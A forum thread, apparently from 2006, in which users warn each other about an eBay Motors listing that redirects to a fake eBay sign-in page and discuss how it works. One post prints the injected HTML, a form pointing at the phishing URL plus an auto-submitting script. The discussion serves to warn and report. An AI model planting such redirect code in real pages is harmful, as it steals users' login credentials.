Possible Ebay Exploit

[RedArmy]

I was looking in the EbayMotors section of Ebay and I was looking at Mustangs and this one was a 1963 or such (complete wrong year btw) and I clicked on it cause I was wondering why the price was so low (around 3000 something). Well, I clicked on it and after that it prompted me for me username and password. Luckily, right before that I noticed the URL and how it had nothing to do with Ebay at all. It looked like this:wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html?
(made it so it wasn't a link by removing the http://). I just thought I would post this so people might be more careful. I opened this link up in a Mozilla browser window where scripts were completely disabled and it sure enough took me to a page that looked like Ebays. I sent an e-mail to the Security center at Ebay to let them know and I just thought I would forewarn you guys incase you didn't know.

Cliffs:
1: Went on Ebay
2: Found possible exploit through link
3: Be more careful and profit

 

[MikeMike]

Originally posted by: RedArmy
I was looking in the EbayMotors section of Ebay and I was looking at Mustangs and this one was a 1963 or such (complete wrong year btw) and I clicked on it cause I was wondering why the price was so low (around 3000 something). Well, I clicked on it and after that it prompted me for me username and password. Luckily, right before that I noticed the URL and how it had nothing to do with Ebay at all. It looked like this:wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html?
(made it so it wasn't a link by removing the http://). I just thought I would post this so people might be more careful. I opened this link up in a Mozilla browser window where scripts were completely disabled and it sure enough took me to a page that looked like Ebays. I sent an e-mail to the Security center at Ebay to let them know and I just thought I would forewarn you guys incase you didn't know.

Cliffs:
1: Went on Ebay
2: Found possible exploit through link
3: Be more careful and profit

search for 1963 mustang, and its the first one you find.
cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

would be the link to the supposed "item"

it then redirects.

its an exploit alright.

 

[orakle]

luckily this exploit got pwned by NoScript in FireFox.. an extension I recommend EVERYONE use. It blocks all javascript except for sites you whitelist.

Edit: I've reported it to ebay staff (live chat) - they should take care of it soon.

 

[GeneValgene]

oh WOW

this should be reported to ebay...

 

[FreshPrince]

Originally posted by: orakle22
luckily this exploit got pwned by NoScript in FireFox.. an extension I recommend EVERYONE use. It blocks all javascript except for sites you whitelist.

wow is firefox just getting that? because I've had that with IE for years 😉

 

[S Freud]

Whoa :Q thanks for the heads up on that one, Ebay is becoming so unsafe for people unaware of these things, what with scam emails and now this!?

 

[Nocturnal]

Someone should post this on Digg.com.

 

[iluvtruenos]

Wow, one more. just look up the nekkid chick and it'll redirect you to the same link.

 

[bmacd]

opera does the redirect, but you're able to go back. Hell, I might fall for it.

-=bmacd=-

 

[RedArmy]

Yeah, NoScript pwns in FireFox...too bad I had it disabled for Ebay, I guess I partially lose at life.

 

[JS80]

wholly crawp

 

[NFS4]

WOW. Scammers are getting even slicker :Q

 

[BrokenVisage]

Nice find, I'll be on the lookout for crap like this now.

 

[iluvtruenos]

I wonder how many usernames they'll get before people start catching on?

 

[ironcrotch]

I wonder how many people have fallen for that holy jeez, has anyone reported that to ebay yet?

 

[RedArmy]

Yeah, I reported it to Ebay Security Center right before I posted this thread

 

[Mo0o]

good catch

 

[NFS4]

How can they do that anyway?

 

[darkxshade]

Hopefully google will give ebay a run for it's money by creating their own auction site to go with their new "paypal killer" because ebay has been going downhill for a long time as is paypal.

 

[MikeMike]

Originally posted by: NFS4
How can they do that anyway?

somehow they imbeded JS into ebay??

i posted it on DIGG, my first DIGG post ever...

 

[RedArmy]

Alright, well my friend found the code, and it goes as follows with the http:// removed:

On Feb-28-06 at 16:31:39 PST, seller added the following information:
</font></p>
<form name="xxx" action="wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa
i1bshowgifUsingSSL.html">
</form>
<script>
xxx.submit();
</script>

 

[QED]

I took a look at the code they tried to use and I can't believe that something so simple works that well.

How in the world does eBay not filter <script> and other known HTML tags within their description entry?????

 

[GeneValgene]

so out of curiosity...is that the ebay seller doing the scam?

 

[zoiks]

Kind of ingenious tho.
The URL "../Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html" looks like its being redirected but in fact its a static html page.

 

[NFS4]

Originally posted by: GeneValgene
so out of curiosity...is that the ebay seller doing the scam?

He has a clean record up until now...